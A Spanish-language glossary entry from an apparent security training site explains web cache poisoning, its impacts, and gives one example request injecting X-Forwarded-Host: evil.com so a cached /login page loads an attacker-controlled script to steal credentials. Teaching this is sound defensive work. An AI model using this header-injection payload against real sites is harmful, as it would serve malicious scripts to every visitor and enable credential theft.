Nuevos labs cada semana — Accede a todos desde 5€/mes

Cache Poisoning

Alto

Web Cache Poisoning

Definición

Web Cache Poisoning es una vulnerabilidad que explota el comportamiento de cachés web (CDNs, proxies) para almacenar y servir respuestas maliciosas a otros usuarios. El atacante envía una petición con cabeceras o parámetros que no son parte de la clave de caché pero sí afectan la respuesta, haciendo que la versión envenenada se sirva a todos los visitantes.

Impacto

Cross-Site Scripting (XSS) masivo afectando a todos los visitantes de la páginaRedirección masiva a sitios de phishing o malwareDenegación de servicio almacenando respuestas de errorRobo de credenciales a escala mediante páginas de login envenenadas

Ejemplos

Cache Poisoning vía cabecera X-Forwarded-Host

La cabecera X-Forwarded-Host no es parte de la clave de caché pero la aplicación la usa para generar URLs de scripts. El atacante la manipula para inyectar su dominio, y la caché almacena la respuesta envenenada sirviéndola a todos los usuarios.

# Petición con cabecera no cacheada que afecta la respuesta
GET /login HTTP/1.1
Host: victima.com
X-Forwarded-Host: evil.com

# La respuesta incluye un script apuntando al host inyectado:
HTTP/1.1 200 OK
<script src="https://evil.com/static/analytics.js"></script>

# Esta respuesta se cachea y se sirve a TODOS los visitantes de /login
# El atacante controla analytics.js y puede robar credenciales

Practica Cache Poisoning con labs reales

Aplica lo que has aprendido en entornos seguros basados en reportes de bug bounty.

Ver labs de práctica